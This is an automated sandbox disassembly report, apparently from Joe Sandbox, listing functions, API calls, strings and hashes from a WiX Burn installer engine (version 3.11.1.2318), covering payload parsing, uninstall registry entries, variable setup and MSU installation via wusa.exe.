Instruction ID: ab5f453bb08e7456ea843c89199a866cdf7dc28d128a3d0913bc5e4068ea95b9
Opcode Fuzzy Hash: 8dd79f228c8919504b3519e6a1b53b1a2be8565909d418a1993d17ed889405ab
Instruction Fuzzy Hash: A601D671A002086BDB10EF66ED89AAEB7ACEBD5315F000065F914D3280D6345D4D8B54

Function 004F2C18 Relevance: 2.7, Strings: 2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 004F2D88
comres.dll, xrefs: 004F2DBF, 004F2DD8, 004F2E00, 004F2E2B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID: 0$comres.dll
API String ID: 0-3030269839
Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction ID: 3b5f0572c4a88c361d8c9342c9468e8f9c16a02f5d1b607ea81ba5af028cd1cf
Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction Fuzzy Hash: 00515870200B8D57DB384968879A7BF2B959B16344F28091FEB46DB392C6CDDF42835E

Function 004FEE7C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004FEE77,?,?,00000008,?,?,004FEB17,00000000), ref: 004FF0A9

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 70ca24b47292dd8345fd7d0977277207b9ca4eb0579ac41c82a91129840c5f2d
Instruction ID: eb8bfae4d656b3feeda6ad1e6cf627f2263bf41eb3b8bfcda5008429421a165f
Opcode Fuzzy Hash: 70ca24b47292dd8345fd7d0977277207b9ca4eb0579ac41c82a91129840c5f2d
Instruction Fuzzy Hash: A5B17C31210608DFD714CF28C486B657BE0FF05365F258669EA99CF3A2C739E986CB44

Function 004EEC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004EEC20

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 2e66cc154ef4a94ccfd3c4950c24d437e5c20d8c4a0cd7768997bc00bfb674fe
Instruction ID: c94235d0af05a56c72ed443d1b5327b62efd2559fe8eb3552e4af7c87a1185e5
Opcode Fuzzy Hash: 2e66cc154ef4a94ccfd3c4950c24d437e5c20d8c4a0cd7768997bc00bfb674fe
Instruction Fuzzy Hash: 20519C719002058BEB28CF5AD885AAABBF4FB48301F25806AD405EB350E3B9ED06DF55

Function 004EE9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,004EE131), ref: 004EE9E1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5e3936a9b88a68af4706d17564ca235be1342802e950c0243afc567a6da95f48
Instruction ID: b19fa623992c18eb14cea17e32f6e92ce5c85ced479ef4d4eba4acb6b1d5c1e6
Opcode Fuzzy Hash: 5e3936a9b88a68af4706d17564ca235be1342802e950c0243afc567a6da95f48
Instruction Fuzzy Hash:

Function 004EFB89 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c780acce18e6f50f277d6bb835f143f5e64a114df11b60c9cc0c942b65d112ee
Instruction ID: ac429e9a73e08d00f87fc428c1c8e728ce4fd7f60579d1031b7555d649e4ef49
Opcode Fuzzy Hash: c780acce18e6f50f277d6bb835f143f5e64a114df11b60c9cc0c942b65d112ee
Instruction Fuzzy Hash: 6602F9321041E24ADB2D463A847003B7BE16B833B271E476FD8B7CB2D6DE18E569D664

Function 004F0B6F Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
Instruction ID: 022182593734574b4ab8a3e7f65113b0d0e148ee30c6d19923c59813bad147c7
Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
Instruction Fuzzy Hash: 55C170332091A60AEF6D4239843407FFBE15AD33B131A179FD5B2CB2D6EE289535D624

Function 004F07AA Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
Instruction ID: 6434332040f985b4c82c25e8a49b31abea8583818aef8653b2f8a34370b89977
Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
Instruction Fuzzy Hash: 43C1AB732091A60AEF2D4239843047FBBE15ED23B031A179FD5B2CB2D7EE289535D624

Function 004F03D5 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
Instruction ID: ed11efdf7df59ee5b9a4984fa37be9bb77830a9d70972cd1d3ee9a653e966f6e
Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
Instruction Fuzzy Hash: FBC1C7321050A65BEF2D8239847407FBBE15AD23B131A179FD5B2CB2D3EE28D535DA24

Function 004F001D Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
Instruction ID: 22be2e89812d0d9047edd923750ba235129603f1f37f8d454a7d60bcb8d426a0
Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
Instruction Fuzzy Hash: 2DB193322051A64BEF2D4339853407FBBE15AD23B131B179FD5B2CB2C6EE289535D624

Function 004F2E47 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9b8bf31c046add8736609a756078212944f88029f724441e201fd0b032d489
Instruction ID: 4e45669c03b70d835f830bf54b0c9d4e90c7286d9707dbe5fa7eaa5baf52a2cd
Opcode Fuzzy Hash: ae9b8bf31c046add8736609a756078212944f88029f724441e201fd0b032d489
Instruction Fuzzy Hash: C561797121060D66DB389A288B55BBF63A4EB41704F20081BFB42DF381D6DD9E82962F

Function 004CCDBD Relevance: 86.1, APIs: 3, Strings: 46, Instructions: 366COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,comres.dll,00000000,0050CA9C,?,00000000), ref: 004CCEF3

Strings

Packaging, xrefs: 004CCEC6
Failed to get @Packaging., xrefs: 004CD213
cabinet.dll, xrefs: 004CD0A0
Failed to parse @FileSize., xrefs: 004CD1A1
LayoutOnly, xrefs: 004CCF8D
download, xrefs: 004CCEE5
Hash, xrefs: 004CD0B7
Payload, xrefs: 004CCDD8
msasn1.dll, xrefs: 004CD024
Invalid value for @Packaging: %ls, xrefs: 004CD200
DownloadUrl, xrefs: 004CCFD9
embedded, xrefs: 004CCF05
Failed to get @Catalog., xrefs: 004CD1D5
FileSize, xrefs: 004CD002
Failed to hex decode @CertificateRootThumbprint., xrefs: 004CD1C0
Failed to hex decode the Payload/@Hash., xrefs: 004CD1DC
Failed to get @SourcePath., xrefs: 004CD1F1
msi.dll, xrefs: 004CD05F
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 004CD1B9
CertificateRootThumbprint, xrefs: 004CD07A
comres.dll, xrefs: 004CCEAA
version.dll, xrefs: 004CD063
Failed to find catalog., xrefs: 004CD1CE
Failed to get payload node count., xrefs: 004CCE10
Failed to to find container: %ls, xrefs: 004CD186
Failed to get @Container., xrefs: 004CD18D
FilePath, xrefs: 004CCEAB
feclient.dll, xrefs: 004CCF8C
Failed to get @Hash., xrefs: 004CD1E3
SourcePath, xrefs: 004CCFB0
external, xrefs: 004CCF21
Failed to get @Id., xrefs: 004CD221
Container, xrefs: 004CCF4B
Failed to get next node., xrefs: 004CD228
wininet.dll, xrefs: 004CD10E
Failed to select payload nodes., xrefs: 004CCDEB
Failed to get @LayoutOnly., xrefs: 004CD197
Failed to get @FileSize., xrefs: 004CD1AB
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 004CD1B2
payload.cpp, xrefs: 004CCE3F
Failed to get @DownloadUrl., xrefs: 004CD1EA
Failed to allocate memory for payload structs., xrefs: 004CCE49
CertificateRootPublicKeyIdentifier, xrefs: 004CD03D
Failed to get @FilePath., xrefs: 004CD21A
Catalog, xrefs: 004CD0EC
Failed to get @CertificateRootThumbprint., xrefs: 004CD1C7

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateCompareProcessString
String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$cabinet.dll$comres.dll$download$embedded$external$feclient.dll$msasn1.dll$msi.dll$payload.cpp$version.dll$wininet.dll
API String ID: 1171520630-1949177747
Opcode ID: 0fc3f901787bfd2ded777d7fe2637fc2b08383bf1f4e70ce23b3eb19036560ae
Instruction ID: 72e29afe8af6b8693ff678cc02ea3833baa9222bed12d2bf843ea88302678c77
Opcode Fuzzy Hash: 0fc3f901787bfd2ded777d7fe2637fc2b08383bf1f4e70ce23b3eb19036560ae
Instruction Fuzzy Hash: D7C1E57AD44626BBCB61DA90CC46F6EBA64BF04720F14027EF901B75D0D778EE019798

Function 004CFF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 004D0592

Strings

"%ls" /uninstall /quiet, xrefs: 004D0448
BundleUpgradeCode, xrefs: 004D0057, 004D005F
URLInfoAbout, xrefs: 004D02A6, 004D02B9
Comments, xrefs: 004D033A, 004D034D
NoRemove, xrefs: 004D0403, 004D0416
3.11.1.2318, xrefs: 004D0193
BundleProviderKey, xrefs: 004D015A, 004D015F
HelpLink, xrefs: 004D025A, 004D026D
BundleVersion, xrefs: 004D00CF, 004D00F5
ParentDisplayName, xrefs: 004D02F2, 004D0305
Failed to write update registration., xrefs: 004D04E5
DisplayIcon, xrefs: 004D01BB, 004D01C5
BundleDetectCode, xrefs: 004D0093, 004D009B
SystemComponent, xrefs: 004D0428, 004D043B
NoModify, xrefs: 004D038B, 004D039E
BundleAddonCode, xrefs: 004D0075, 004D007D
"%ls" /modify, xrefs: 004D03B0
"%ls" %ls, xrefs: 004D0484
NoElevateOnModify, xrefs: 004D03D7, 004D03EA
ModifyPath, xrefs: 004D03B5, 004D03CB
Failed to create registration key., xrefs: 004D001C
VersionMajor, xrefs: 004D010F, 004D0115
Failed to write %ls value., xrefs: 004D0531
QuietUninstallString, xrefs: 004D044D, 004D0463
BundleCachePath, xrefs: 004D003C, 004D0041
VersionMinor, xrefs: 004D0138, 004D013E
Failed to register the bundle dependency key., xrefs: 004D0553
/modify, xrefs: 004D0474
EstimatedSize, xrefs: 004D051C, 004D0521, 004D0530
%hu.%hu.%hu.%hu, xrefs: 004D00F0
Failed to write software tags., xrefs: 004D04C5
Publisher, xrefs: 004D0234, 004D0247
ParentKeyName, xrefs: 004D0312, 004D0325
BundleTag, xrefs: 004D017B, 004D0180
Failed to update name and publisher., xrefs: 004D01EE
%s,0, xrefs: 004D01C0
EngineVersion, xrefs: 004D019D, 004D01A2
Failed to cache bundle from path: %ls, xrefs: 004CFFEF
URLUpdateInfo, xrefs: 004D02CC, 004D02DF
HelpTelephone, xrefs: 004D0280, 004D0293
%hs, xrefs: 004D0198
Failed to update resume mode., xrefs: 004D056D
/uninstall, xrefs: 004D047B, 004D0480
DisplayVersion, xrefs: 004D0201, 004D0214
BundlePatchCode, xrefs: 004D00B1, 004D00B9
Contact, xrefs: 004D0362, 004D0375
UninstallString, xrefs: 004D0489, 004D049F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
API String ID: 3535843008-2755343042
Opcode ID: 1e5667240d7160d61682973780bd3bdd27c428e545dbc250a6f2c1d5605bb0e0
Instruction ID: 9c738646f201db47723b5af336d86c14ac47f3438a61811f15d5ec30a607bc49
Opcode Fuzzy Hash: 1e5667240d7160d61682973780bd3bdd27c428e545dbc250a6f2c1d5605bb0e0
Instruction Fuzzy Hash: 63F1C731A41A26BBDF229660DD26FAE7E65BB00714F040253FD0077391D7B9DD90EAC9

Function 004C8476 Relevance: 61.6, APIs: 5, Strings: 30, Instructions: 331COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,80070490,?,?,?,?,?,?,?,ETL,004EC1BF,?,?,?), ref: 004C84A7
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,ETL,004EC1BF,?,?,?,?,ETL,Chain), ref: 004C8804

Strings

Type, xrefs: 004C85A3
Initializing version variable '%ls' to value '%ls', xrefs: 004C8653
Value, xrefs: 004C8565
Failed to insert variable '%ls'., xrefs: 004C86C6
Initializing numeric variable '%ls' to value '%ls', xrefs: 004C85E2
Invalid value for @Type: %ls, xrefs: 004C8778
Failed to change variant type., xrefs: 004C87DA
Failed to get @Value., xrefs: 004C8796
version, xrefs: 004C862C
Initializing hidden variable '%ls', xrefs: 004C8671
Failed to get variable node count., xrefs: 004C84E1
Hidden, xrefs: 004C852F
ETL, xrefs: 004C8476
variable.cpp, xrefs: 004C87B9
Failed to set value of variable: %ls, xrefs: 004C87A7
Initializing string variable '%ls' to value '%ls', xrefs: 004C861A
string, xrefs: 004C85F7
Failed to find variable value '%ls'., xrefs: 004C87D2
Failed to set variant value., xrefs: 004C878F
Failed to get @Persisted., xrefs: 004C87E1
Failed to get @Hidden., xrefs: 004C87E8
numeric, xrefs: 004C85BC
Failed to get @Type., xrefs: 004C8788
Persisted, xrefs: 004C854A
Failed to get @Id., xrefs: 004C87EF
Variable, xrefs: 004C84B1
Failed to get next node., xrefs: 004C87F6
Attempt to set built-in variable value: %ls, xrefs: 004C87C8
Failed to select variable nodes., xrefs: 004C84C4
Failed to set variant encryption, xrefs: 004C879D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Attempt to set built-in variable value: %ls$ETL$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-738220561
Opcode ID: c593c04ec0252bdfb9a1ba092c42bb9ea5890bbe9041c33c0043f8dfcad9dd99
Instruction ID: ab58b0611b16dbffda5eec5f0d297bb7016f51fd34d1844f135abbcd11d854c5
Opcode Fuzzy Hash: c593c04ec0252bdfb9a1ba092c42bb9ea5890bbe9041c33c0043f8dfcad9dd99
Instruction Fuzzy Hash: 9AB1BF3AD0121ABBCB519B94CC45FAEBF74BF45710F20025EF910B62D1DB799A40DB98

Function 004E6CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,004DBDDC,00000007,?,?,?), ref: 004E6D20

Part of subcall function 00500ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,004C5EB2,00000000), ref: 00500AE0
Part of subcall function 00500ACC: GetProcAddress.KERNEL32(00000000), ref: 00500AE7
Part of subcall function 00500ACC: GetLastError.KERNEL32(?,?,?,004C5EB2,00000000), ref: 00500AFE

CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 004E710F
CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 004E7123

Strings

Failed to ensure WU service was enabled to install MSU package., xrefs: 004E6F2E
WixBundleExecutePackageCacheFolder, xrefs: 004E6E0B, 004E713B
"%ls" "%ls" /quiet /norestart, xrefs: 004E6E48
SysNative\, xrefs: 004E6D6A
Failed to CreateProcess on path: %ls, xrefs: 004E6F9A
Failed to find Windows directory., xrefs: 004E6D5F
Failed to get action arguments for MSU package., xrefs: 004E6DD6
Failed to get cached path for package: %ls, xrefs: 004E6DFC
"%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 004E6E75
Failed to find System32 directory., xrefs: 004E6D95
Failed to wait for executable to complete: %ls, xrefs: 004E709E
Failed to append SysNative directory., xrefs: 004E6D7D
Failed to build MSU path., xrefs: 004E6E35
Failed to append log switch to MSU command-line., xrefs: 004E6EB6
Failed to append log path to MSU command-line., xrefs: 004E6ED4
Failed to format MSU install command., xrefs: 004E6E5C
msuengine.cpp, xrefs: 004E6F8D, 004E7022, 004E704A
Failed to format MSU uninstall command., xrefs: 004E6E89
wusa.exe, xrefs: 004E6DA0
Failed to get process exit code., xrefs: 004E702C
Bootstrapper application aborted during MSU progress., xrefs: 004E7054
Failed to determine WOW64 status., xrefs: 004E6D32
/log:, xrefs: 004E6EA2
D, xrefs: 004E6F3B
Failed to allocate WUSA.exe path., xrefs: 004E6DB3
2, xrefs: 004E6FB3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
API String ID: 1400713077-4261965642
Opcode ID: b1ae3cf937c460aecb250a62bcafbc2eefb4c87a936165514ac852556f8d5abe
Instruction ID: a593b1d23a6160c7636f127ba24b29bbfc37fc7a1cf0d702fb232c0a6bcb851d
Opcode Fuzzy Hash: b1ae3cf937c460aecb250a62bcafbc2eefb4c87a936165514ac852556f8d5abe
